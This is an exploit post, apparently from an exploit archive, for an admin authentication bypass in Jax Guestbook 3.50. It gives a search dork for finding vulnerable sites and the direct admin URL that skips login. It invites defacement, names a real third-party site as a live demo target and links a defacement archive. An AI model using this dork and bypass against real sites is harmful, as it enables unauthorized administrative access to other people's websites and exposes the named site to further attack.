Exploit for php platform in category web applications
========================================
Jax Guestbook admin bypass vulnerability
========================================
# Exploit Title: Jax Guestbook admin bypass vulnerability
# Date: 3.10.2010
# Author: EraGoN
# Software http://www.jtr.de/scripting/php/guestbook/index_eng.html
# Version: 3.50
# Tested on: Windows XP - SP2/SP3
Hi guys !
Dork :
inurl:jax_guestbook.php
In the url http://site.com/guestbook/jax_guestbook.php delete jax_guestbook.php
URL to add :
/admin/guestbook.admin.php
You can add news writing hacked etc.. ;)
Results in /../jax_guestbook.php
DEMO :
http://www.foerderverein-lfs-celle.de/gulli/jax_guestbook.php?language=german
###############
http://www.zone-h.org/archive/published=0/notifier=EraGoN
Greetz : The|Denny - Loock3D - DJ-DUKLI and all albanian/kosovo hackers !
www.eragon.ws - www.albanian-legends.com
###############
# 0day.today [2018-01-10] #